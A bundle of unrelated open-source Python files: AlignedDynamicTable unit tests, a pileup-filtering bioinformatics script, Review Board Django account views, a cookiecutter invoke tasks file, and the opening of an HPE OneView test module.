"""Test that just checks that populating the tables with data works correctly"""
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container')
def test_init_categories_without_category_tables_error(self):
# Test raise error if categories is given without category_tables
with self.assertRaisesWith(ValueError, "Categories provided but no category_tables given"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['cat1', 'cat2'])
def test_init_length_mismatch_between_categories_and_category_tables(self):
# Test length mismatch between categories and category_tables
with self.assertRaisesWith(ValueError, "0 category_tables given but 2 categories specified"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['cat1', 'cat2'],
category_tables=[])
def test_init_category_table_names_do_not_match_categories(self):
# Construct some categories for testing
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
# Test add category_table that is not listed in the categories list
with self.assertRaisesWith(ValueError,
"DynamicTable test3 does not appear in categories ['test1', 'test2', 't3']"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 't3'], # bad name for 'test3'
category_tables=categories)
def test_init_duplicate_category_table_name(self):
# Test duplicate table name
with self.assertRaisesWith(ValueError, "Duplicate table name test1 found in input dynamic_tables"):
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']]
) for val in ['test1', 'test1', 'test3']]
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 'test3'],
category_tables=categories)
def test_init_misaligned_category_tables(self):
"""Test misaligned category tables"""
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']]
) for val in ['test1', 'test2']]
categories.append(DynamicTable(name='test3',
description="test3 description",
columns=[VectorData(name='test3 '+t,
description='test3 '+t+' description',
data=np.arange(8)) for t in ['c1', 'c2', 'c3']]))
with self.assertRaisesWith(ValueError,
"Category DynamicTable test3 does not align, it has 8 rows expected 10"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
categories=['test1', 'test2', 'test3'],
category_tables=categories)
def test_init_with_custom_empty_categories(self):
"""Test that we can create an empty table with custom categories"""
category_names = ['test1', 'test2', 'test3']
categories = [DynamicTable(name=val, description=val+" description") for val in category_names]
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_init_with_custom_nonempty_categories(self):
"""Test that we can create an empty table with custom categories"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertEqual(temp.categories, category_names)
def test_init_with_custom_nonempty_categories_and_main(self):
"""
Test that we can create a non-empty table with custom non-empty categories
"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']])
self.assertEqual(temp.categories, category_names)
self.assertTrue('test1' in temp) # test that contains category works
self.assertTrue(('test1', 'c1') in temp) # test that contains a column works
# test the error case of a tuple with len !=2
with self.assertRaisesWith(ValueError, "Expected tuple of strings of length 2 got tuple of length 3"):
('test1', 'c1', 't3') in temp
self.assertTupleEqual(temp.colnames, ('main_c1', 'main_c2', 'main_c3')) # confirm column names
def test_init_with_custom_misaligned_categories(self):
"""Test that we cannot create an empty table with custom categories"""
num_rows = 10
val1 = 'test1'
val2 = 'test2'
categories = [DynamicTable(name=val1,
description=val1+" description",
columns=[VectorData(name=val1+t,
description=val1+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]),
DynamicTable(name=val2,
description=val2+" description",
columns=[VectorData(name=val2+t,
description=val2+t+' description',
data=np.arange(num_rows+1)) for t in ['c1', 'c2', 'c3']])
]
with self.assertRaisesWith(ValueError,
"Category DynamicTable test2 does not align, it has 11 rows expected 10"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_init_with_duplicate_custom_categories(self):
"""Test that we can create an empty table with custom categories"""
category_names = ['test1', 'test1']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
with self.assertRaisesWith(ValueError, "Duplicate table name test1 found in input dynamic_tables"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_init_with_bad_custom_categories(self):
"""Test that we cannot provide a category that is not a DynamicTable"""
num_rows = 10
categories = [ # good category
DynamicTable(name='test1',
description="test1 description",
columns=[VectorData(name='test1'+t,
description='test1' + t + ' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
),
# use a list as a bad category example
[0, 1, 2]]
with self.assertRaisesWith(ValueError, "Category table with index 1 is not a DynamicTable"):
AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
def test_round_trip_container(self):
"""Test read and write the container by itself"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
curr = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
with HDF5IO(self.path, manager=get_manager(), mode='w') as io:
io.write(curr)
with HDF5IO(self.path, manager=get_manager(), mode='r') as io:
incon = io.read()
self.assertListEqual(incon.categories, curr.categories)
for n in category_names:
assert_frame_equal(incon[n], curr[n])
def test_add_category(self):
"""Test that we can correct a non-empty category to an existing table"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories[0:2])
self.assertListEqual(adt.categories, category_names[0:2])
adt.add_category(categories[-1])
self.assertListEqual(adt.categories, category_names)
def test_add_category_misaligned_rows(self):
"""Test that we can correct a non-empty category to an existing table"""
category_names = ['test1', 'test2']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertListEqual(adt.categories, category_names)
with self.assertRaisesWith(ValueError, "New category DynamicTable does not align, it has 8 rows expected 10"):
adt.add_category(DynamicTable(name='test3',
description='test3_description',
columns=[VectorData(name='test3_'+t,
description='test3 '+t+' description',
data=np.arange(num_rows - 2)) for t in ['c1', 'c2', 'c3']
]))
def test_add_category_already_in_table(self):
category_names = ['test1', 'test2', 'test2']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories[0:2])
self.assertListEqual(adt.categories, category_names[0:2])
with self.assertRaisesWith(ValueError, "Category test2 already in the table"):
adt.add_category(categories[-1])
def test_add_column(self):
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
# Test successful add
adt.add_column(name='testA', description='testA', data=np.arange(10))
self.assertTupleEqual(adt.colnames, ('test_c1', 'test_c2', 'test_c3', 'testA'))
def test_add_column_bad_category(self):
"""Test add column with bad category"""
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
with self.assertRaisesWith(KeyError, "'Category mycat not in table'"):
adt.add_column(category='mycat', name='testA', description='testA', data=np.arange(10))
def test_add_column_bad_length(self):
"""Test add column that is too short"""
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
columns=[VectorData(name='test_'+t,
description='test_'+t+' description',
data=np.arange(10)) for t in ['c1', 'c2', 'c3']])
# Test successful add
with self.assertRaisesWith(ValueError, "column must have the same number of rows as 'id'"):
adt.add_column(name='testA', description='testA', data=np.arange(8))
def test_add_column_to_subcategory(self):
"""Test adding a column to a subcategory"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=val+t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories)
self.assertListEqual(adt.categories, category_names)
# Test successful add
adt.add_column(category='test2', name='testA', description='testA', data=np.arange(10))
self.assertTupleEqual(adt.get_category('test2').colnames, ('test2c1', 'test2c2', 'test2c3', 'testA'))
def test_add_row(self):
"""Test adding a row to a non_empty table"""
category_names = ['test1', ]
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2']]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2']])
self.assertListEqual(temp.categories, category_names)
# Test successful add
temp.add_row(test1=dict(c1=1, c2=2), main_c1=3, main_c2=5)
self.assertListEqual(temp[10].iloc[0].tolist(), [3, 5, 10, 1, 2])
# Test successful add version 2
temp.add_row(data=dict(test1=dict(c1=1, c2=2), main_c1=4, main_c2=5))
self.assertListEqual(temp[11].iloc[0].tolist(), [4, 5, 11, 1, 2])
# Test missing categories data
with self.assertRaises(KeyError) as ke:
temp.add_row(main_c1=3, main_c2=5)
self.assertTrue("row data keys do not match" in str(ke.exception))
def test_get_item(self):
"""Test getting elements from the table"""
category_names = ['test1', ]
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows) + i + 3)
for i, t in enumerate(['c1', 'c2'])]
) for val in category_names]
temp = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)+2) for t in ['c1', 'c2']])
self.assertListEqual(temp.categories, category_names)
# Test slicing with a single index
self.assertListEqual(temp[5].iloc[0].tolist(), [7, 7, 5, 8, 9])
# Test slice with list
self.assertListEqual(temp[[5, 7]].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[[5, 7]].iloc[1].tolist(), [9, 9, 7, 10, 11])
# Test slice with slice
self.assertListEqual(temp[5:7].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[5:7].iloc[1].tolist(), [8, 8, 6, 9, 10])
# Test slice with numpy index arrya
self.assertListEqual(temp[np.asarray([5, 8])].iloc[0].tolist(), [7, 7, 5, 8, 9])
self.assertListEqual(temp[np.asarray([5, 8])].iloc[1].tolist(), [10, 10, 8, 11, 12])
# Test slicing for a single column
self.assertListEqual(temp['main_c1'][:].tolist(), (np.arange(num_rows)+2).tolist())
# Test slicing for a single category
assert_frame_equal(temp['test1'], categories[0].to_dataframe())
# Test getting the main table
assert_frame_equal(temp[None], temp.to_dataframe())
# Test getting a specific column
self.assertListEqual(temp['test1', 'c1'][:].tolist(), (np.arange(num_rows) + 3).tolist())
# Test getting a specific cell
self.assertEqual(temp[None, 'main_c1', 1], 3)
# Test bad selection tuple
with self.assertRaisesWith(ValueError,
"Expected tuple of length 2 or 3 with (category, column, row) as value."):
temp[('main_c1',)]
def test_to_dataframe(self):
"""Test that the to_dataframe method works"""
category_names = ['test1', 'test2', 'test3']
num_rows = 10
categories = [DynamicTable(name=val,
description=val+" description",
columns=[VectorData(name=t,
description=val+t+' description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']]
) for val in category_names]
adt = AlignedDynamicTable(
name='test_aligned_table',
description='Test aligned container',
category_tables=categories,
columns=[VectorData(name='main_' + t,
description='main_'+t+'_description',
data=np.arange(num_rows)) for t in ['c1', 'c2', 'c3']])
# Test the to_dataframe method with default settings
tdf = adt.to_dataframe()
self.assertListEqual(tdf.index.tolist(), list(range(10)))
self.assertTupleEqual(tdf.index.name, ('test_aligned_table', 'id'))
expected_cols = [('test_aligned_table', 'main_c1'),
('test_aligned_table', 'main_c2'),
('test_aligned_table', 'main_c3'),
('test1', 'id'), ('test1', 'c1'), ('test1', 'c2'), ('test1', 'c3'),
('test2', 'id'), ('test2', 'c1'), ('test2', 'c2'), ('test2', 'c3'),
('test3', 'id'), ('test3', 'c1'), ('test3', 'c2'), ('test3', 'c3')]
tdf_cols = tdf.columns.tolist()
for v in zip(expected_cols, tdf_cols):
self.assertTupleEqual(v[0], v[1])
# test the to_dataframe method with ignore_category_ids set to True
tdf = adt.to_dataframe(ignore_category_ids=True)
self.assertListEqual(tdf.index.tolist(), list(range(10)))
self.assertTupleEqual(tdf.index.name, ('test_aligned_table', 'id'))
expected_cols = [('test_aligned_table', 'main_c1'),
('test_aligned_table', 'main_c2'),
('test_aligned_table', 'main_c3'),
('test1', 'c1'), ('test1', 'c2'), ('test1', 'c3'),
('test2', 'c1'), ('test2', 'c2'), ('test2', 'c3'),
('test3', 'c1'), ('test3', 'c2'), ('test3', 'c3')]
tdf_cols = tdf.columns.tolist()
for v in zip(expected_cols, tdf_cols):
self.assertTupleEqual(v[0], v[1])
def test_nested_aligned_dynamic_table_not_allowed(self):
"""
Test that using and AlignedDynamicTable as category for an AlignedDynamicTable is not allowed
"""
# create an AlignedDynamicTable as category
subsubcol1 = VectorData(name='sub_sub_column1', description='test sub sub column', data=['test11', 'test12'])
sub_category = DynamicTable(name='sub_category1', description='test subcategory table', columns=[subsubcol1, ])
subcol1 = VectorData(name='sub_column1', description='test-subcolumn', data=['test1', 'test2'])
adt_category = AlignedDynamicTable(
name='category1',
description='test using AlignedDynamicTable as a category',
columns=[subcol1, ],
category_tables=[sub_category, ])
# Create a regular column for our main AlignedDynamicTable
col1 = VectorData(name='column1', description='regular test column', data=['test1', 'test2'])
# test 1: Make sure we can't add the AlignedDynamicTable category on init
msg = ("Category table with index %i is an AlignedDynamicTable. "
"Nesting of AlignedDynamicTable is currently not supported." % 0)
with self.assertRaisesWith(ValueError, msg):
# create the nested AlignedDynamicTable with our adt_category as a sub-category
AlignedDynamicTable(
name='nested_adt',
description='test nesting AlignedDynamicTable',
columns=[col1, ],
category_tables=[adt_category, ])
# test 2: Make sure we can't add the AlignedDynamicTable category via add_category
adt = AlignedDynamicTable(
name='nested_adt',
description='test nesting AlignedDynamicTable',
columns=[col1, ])
msg = "Category is an AlignedDynamicTable. Nesting of AlignedDynamicTable is currently not supported."
with self.assertRaisesWith(ValueError, msg):
adt.add_category(adt_category)
| 2.515625 | 3 |
Filtering/filter_pileup_for_unique_sites.py | Lammlab/Resic | 3 | 12770006 | <gh_stars>1-10
##############################################################################################################################
# Author: <NAME>
# Main goal: Takes several pileup files and for each one prints to a new file only unique sites (that is, only sites that are
# not in any of the other pileup files
##############################################################################################################################
from docopt import docopt
import sys
import shutil
import Utility.generators_utilities as gen_util
from Utility.Pileup_class import Pileup_line
from Utility.parallel_generator import parallel_generator
from Processing.pileup_sorting import pileup_sort
from Utility.multiline_sort import multiline_sort_pileup
def get_candidate_nucl(pileup_line):
clean_str=pileup_line.reads_string
clean_str = [char for char in clean_str if not char in ('^', '$')]
clean_str = ''.join(clean_str)
sense_string = clean_str.replace('^','')
sense_string = clean_str.replace('$','')
sense_string = clean_str.replace(',','.')
# TODO before use assumed letters are only upper case. I fix this assumption here
sense_string_upper = sense_string.upper()
# Find the candidate nucleotide reads
nucl_A, nucl_C, nucl_T, nucl_G = 0, 0, 0, 0
nucl_changes = {"A": 0, "C": 0, "G": 0, "T": 0, "a": 0, "c": 0, "g": 0, "t": 0}
for nucl in list(sense_string):
if (nucl=='A' or nucl=='C' or nucl=='G' or nucl=='T' or nucl=='a' or nucl=='c' or nucl=='g' or nucl=='t'):
nucl_changes[nucl] = nucl_changes[nucl]+1
else:
continue
# get the maximal nucleous change, key is the value of the dict
(candidate_nucl, candidate_nucl_reads) = max(nucl_changes.items(), key=lambda x: x[1])
return(candidate_nucl)
def write_unique_sites_doing_nothing(positive_pileup_list, sorted_input=True):
"""
:param pileup_filename: positive pileup to be filtered
:param sorted_input: binary flag, set to False if input pileups are not sorted
:return
"""
# sorting pileups if necessary and preparing filenames
sorted_positive_pileups = []
if not sorted_input:
for pileup in positive_pileup_list:
multiline_sort_pileup(1, '~~~', 1, pileup, 2, pileup + "_sorted.pileup")
sorted_positive_pileups.append(pileup + "_sorted.pileup")
else:
sorted_positive_pileups = positive_pileup_list
#create output files for each pileup
output_positive_pileups = []
for pile in sorted_positive_pileups:
splited = pile.split(".")
shutil.copyfile(pile, ".".join(splited[:-1]) + "_unique." + splited[-1])
output_positive_pileups.append(".".join(splited[:-1]) + "_unique." + splited[-1])
return output_positive_pileups
def write_unique_sites(positive_pileup_list, sorted_input=True):
"""
:param pileup_filename: positive pileup to be filtered
:param sorted_input: binary flag, set to False if input pileups are not sorted
:return
"""
# sorting pileups if necessary and preparing filenames
sorted_positive_pileups = []
if not sorted_input:
for pileup in positive_pileup_list:
multiline_sort_pileup(1, '~~~', 1, pileup, 2, pileup + "_sorted.pileup")
sorted_positive_pileups.append(pileup + "_sorted.pileup")
else:
sorted_positive_pileups = positive_pileup_list
#create output files for each pileup
output_positive_pileups = []
for pile in sorted_positive_pileups:
splited = pile.split(".")
output_positive_pileups.append(".".join(splited[:-1]) + "_unique." + splited[-1])
# parameters for parallel generator
pos_obj_list = [open(pile) for pile in sorted_positive_pileups]
out_obj_list = [open(out,'w') for out in output_positive_pileups]
pos_gen_list = []
get_pos_and_id = lambda x: (x.reference_id, x.gene_pos)
# logic of the function
try:
for file_obj in pos_obj_list:
pos_gen_list.append(gen_util.class_generator(Pileup_line, file=file_obj))
parallel_gen = parallel_generator([*pos_gen_list],
[get_pos_and_id for i in range(len([*pos_gen_list]))])
for listlist in parallel_gen: # listlist: list of lists, each entry in listlist is a list of items from one generator
for pileup in listlist:
if pileup is not None:
if pileup[0].reference_id == "NC_000001.10" and pileup[0].gene_pos == 564559:
print(pos_obj_list, listlist)
true_index_list = [index for index, value in enumerate(listlist) if value]
if len(true_index_list) == 1:
#print(true_index_list)
out_obj_list[true_index_list[0]].write(str(listlist[true_index_list[0]][0]) + "\n")
# for conditions that in hyper there are 1 site that were mapped in 2 different times (A-G (A_G file)and
# A-g(C_T file)). True for non stranded sittuations. In these cases we leave only once the site randomly
if len(true_index_list) == 2:
if get_candidate_nucl(listlist[true_index_list[0]][0]).upper() == get_candidate_nucl(listlist[true_index_list[1]][0]).upper():
out_obj_list[true_index_list[1]].write(str(listlist[true_index_list[1]][0]) + "\n")
if len(true_index_list) == 3:
if get_candidate_nucl(listlist[true_index_list[0]][0]).upper() == get_candidate_nucl(listlist[true_index_list[1]][0]).upper() and \
get_candidate_nucl(listlist[true_index_list[2]][0]).upper() == get_candidate_nucl(listlist[true_index_list[0]][0]).upper():
out_obj_list[true_index_list[1]].write(str(listlist[true_index_list[1]][0]) + "\n")
except Exception as e:
print(e)
for out_file in out_obj_list:
out_file.close()
for file in pos_obj_list:
file.close()
return output_positive_pileups
if __name__ == '__main__':
pass
| 2.5 | 2 |
reviewboard/accounts/views.py | amalik2/reviewboard | 921 | 12770007 | from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.forms.forms import ErrorDict
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic.base import TemplateView
from djblets.auth.views import register
from djblets.configforms.views import ConfigPagesView
from djblets.features.decorators import feature_required
from djblets.forms.fieldsets import filter_fieldsets
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.compat.django.shortcuts import render
from djblets.util.decorators import augment_method_from
from djblets.views.generic.etag import ETagViewMixin
from reviewboard.accounts.backends import get_enabled_auth_backends
from reviewboard.accounts.forms.registration import RegistrationForm
from reviewboard.accounts.mixins import CheckLoginRequiredViewMixin
from reviewboard.accounts.models import Profile
from reviewboard.accounts.pages import AccountPage, OAuth2Page, PrivacyPage
from reviewboard.accounts.privacy import is_consent_missing
from reviewboard.admin.decorators import check_read_only
from reviewboard.avatars import avatar_services
from reviewboard.notifications.email.decorators import preview_email
from reviewboard.notifications.email.message import \
prepare_password_changed_mail
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.oauth.forms import (UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.mixins import CheckLocalSiteAccessViewMixin
from reviewboard.site.urlresolvers import local_site_reverse
class UserInfoboxView(CheckLoginRequiredViewMixin,
CheckLocalSiteAccessViewMixin,
ETagViewMixin,
TemplateView):
"""Displays information on a user, for use in user pop-up infoboxes.
This is meant to be embedded in other pages, rather than being
a standalone page.
"""
template_name = 'accounts/user_infobox.html'
def __init__(self, **kwargs):
"""Initialize a view for the request.
Args:
**kwargs (dict):
Keyword arguments passed to :py:meth:`as_view`.
"""
super(UserInfoboxView, self).__init__(**kwargs)
self._lookup_user = None
self._show_profile = None
self._timezone = None
def get_etag_data(self, request, username, *args, **kwargs):
"""Return an ETag for the view.
This will look up some state needed for the request and generate a
suitable ETag.
Args:
request (django.http.HttpRequest):
The HTTP request from the client.
username (unicode):
The username of the user being looked up.
*args (tuple):
Positional arguments to pass to the handler.
**kwargs (tuple):
Keyword arguments to pass to the handler.
These will be arguments provided by the URL pattern.
Returns:
unicode:
The ETag for the page.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
user = get_object_or_404(User, username=username)
self._lookup_user = user
profile = user.get_profile()
self._show_profile = user.is_profile_visible(request.user)
self._timezone = profile.timezone
etag_data = [
user.first_name,
user.last_name,
user.email,
six.text_type(user.last_login),
six.text_type(settings.TEMPLATE_SERIAL),
six.text_type(self._show_profile),
self._timezone,
]
if avatar_services.avatars_enabled:
avatar_service = avatar_services.for_user(user)
if avatar_service:
etag_data.extend(avatar_service.get_etag_data(user))
local_site = self.local_site
for hook in UserInfoboxHook.hooks:
try:
etag_data.append(hook.get_etag_data(
user=user,
request=request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'get_etag_data method in extension "%s": %s',
hook.extension.id, e)
return ':'.join(etag_data)
def get_context_data(self, **kwargs):
"""Return data for the template.
This will return information on the user, along with information from
any extension hooks used for the page.
Args:
**kwargs (tuple):
Additional keyword arguments from the URL pattern.
Returns:
dict:
Context data for the template.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
# These are accessed several times, so bring them in to reduce
# attribute lookups.
user = self._lookup_user
username = user.username
local_site = self.local_site
extra_content = []
for hook in UserInfoboxHook.hooks:
try:
extra_content.append(hook.render(
user=user,
request=self.request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'render method in extension "%s": %s',
hook.extension.id, e)
review_requests_url = local_site_reverse('user', local_site=local_site,
args=[username])
reviews_url = local_site_reverse('user-grid', local_site=local_site,
args=[username, 'reviews'])
has_avatar = (
avatar_services.avatars_enabled and
avatar_services.for_user(user) is not None
)
return {
'extra_content': mark_safe(''.join(extra_content)),
'full_name': user.get_full_name(),
'has_avatar': has_avatar,
'infobox_user': user,
'review_requests_url': review_requests_url,
'reviews_url': reviews_url,
'show_profile': self._show_profile,
'timezone': self._timezone,
}
@csrf_protect
def account_register(request, next_url='dashboard'):
"""Display the appropriate registration page.
If registration is enabled and the selected authentication backend supports
creation of users, this will return the appropriate registration page. If
registration is not supported, this will redirect to the login view.
"""
siteconfig = SiteConfiguration.objects.get_current()
auth_backends = get_enabled_auth_backends()
if (auth_backends[0].supports_registration and
siteconfig.get('auth_enable_registration') and
not siteconfig.get('site_read_only')):
response = register(request, next_page=reverse(next_url),
form_class=RegistrationForm)
return response
return HttpResponseRedirect(reverse("login"))
class MyAccountView(ConfigPagesView):
"""Displays the My Account page containing user preferences.
The page will be built based on registered pages and forms. This makes
it easy to plug in new bits of UI for the page, which is handy for
extensions that want to offer customization for users.
"""
title = _('My Account')
css_bundle_names = [
'account-page',
]
js_bundle_names = [
'3rdparty-jsonlint',
'config-forms',
'account-page',
]
@method_decorator(login_required)
@method_decorator(check_read_only)
@augment_method_from(ConfigPagesView)
def dispatch(self, *args, **kwargs):
"""Handle the view.
This just falls back to the djblets ConfigPagesView.dispatch
implementation.
"""
pass
@property
def nav_title(self):
"""Get the title for the navigation section."""
return self.request.user.username
@property
def page_classes(self):
"""The list of page classes for this view.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, only the privacy page will be
shown.
"""
if self.is_user_missing_consent:
return [AccountPage.registry.get('page_id', PrivacyPage.page_id)]
return list(AccountPage.registry)
@cached_property
def ordered_user_local_sites(self):
"""Get the user's local sites, ordered by name."""
return self.request.user.local_site.order_by('name')
@property
def render_sidebar(self):
"""Whether or not to render the sidebar.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, the sidebar will not render.
This is to prevent the user from navigating away from the privacy page
before making decisions.
"""
return not self.is_user_missing_consent
@cached_property
def is_user_missing_consent(self):
"""Whether or not the user is missing consent."""
return is_consent_missing(self.request.user)
@login_required
@preview_email(prepare_password_changed_mail)
def preview_password_changed_email(request):
return {
'user': request.user,
}
@login_required
@feature_required(oauth2_service_feature)
def edit_oauth_app(request, app_id=None):
"""Create or edit an OAuth2 application.
Args:
request (django.http.HttpRequest):
The current HTTP request.
app_id (int, optional):
The ID of the application to edit.
If this argument is ``None`` a new application will be edited.
Returns:
django.http.HttpResponse:
The rendered view.
"""
# If we import this at global scope, it will cause issues with admin sites
# being automatically registered.
from reviewboard.oauth.admin import ApplicationAdmin
if app_id:
app = get_object_or_404(
Application,
pk=app_id,
user=request.user,
)
form_cls = UserApplicationChangeForm
fieldsets = ApplicationAdmin.fieldsets
else:
app = None
form_cls = UserApplicationCreationForm
fieldsets = ApplicationAdmin.add_fieldsets
if request.method == 'POST':
form_data = request.POST.copy()
form = form_cls(user=request.user, data=form_data, initial=None,
instance=app)
if form.is_valid():
app = form.save()
if app_id is not None:
next_url = OAuth2Page.get_absolute_url()
else:
next_url = reverse('edit-oauth-app', args=(app.pk,))
return HttpResponseRedirect(next_url)
else:
form = form_cls(user=request.user, data=None, initial=None,
instance=app)
# Show a warning at the top of the form when the form is disabled for
# security.
#
# We don't need to worry about full_clean not being called (which would
# be if we went through form.errors) because this form will never be
# saved.
if app and app.is_disabled_for_security:
form._errors = ErrorDict({
'__all__': form.error_class(
[form.DISABLED_FOR_SECURITY_ERROR],
),
})
return render(
request=request,
template_name='accounts/edit_oauth_app.html',
context={
'app': app,
'form': form,
'fieldsets': filter_fieldsets(form=form_cls,
fieldsets=fieldsets),
'oauth2_page_url': OAuth2Page.get_absolute_url(),
'request': request,
})
| 1.210938 | 1 |
{{cookiecutter.project_slug}}/tasks.py | i2biz/cookiecutter-python-pylint | 0 | 12770008 | <filename>{{cookiecutter.project_slug}}/tasks.py
# coding=utf-8
from invoke import task
@task
def style(ctx):
ctx.run(
"black --check {{cookiecutter.project_slug}} {{cookiecutter.project_slug}}_test"
)
@task
def lint(ctx):
ctx.run(
"pylint {{cookiecutter.project_slug}} {{cookiecutter.project_slug}}_test -r n"
)
@task
def test(ctx):
ctx.run(
"py.test -v --cov {{cookiecutter.project_slug}} --cov-report=html --cov-report=term-missing {{cookiecutter.project_slug}}_test"
)
@task(pre=[test, style, lint])
def check(ctx):
pass
| 1.921875 | 2 |
test/test_image_streamer_deployment_group_facts.py | nabhajit-ray/oneview-ansible | 108 | 12770009 | <reponame>nabhajit-ray/oneview-ansible
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import pytest
from hpe_test_utils import ImageStreamerBaseFactsTest
from oneview_module_loader import DeploymentGroupFactsModule
@pytest.mark.resource(TestDeploymentGroupFactsModule='deployment_groups')
class TestDeploymentGroupFactsModule(ImageStreamerBaseFactsTest):
"""
ImageStreamerBaseFactsTest has common tests for the parameters support.
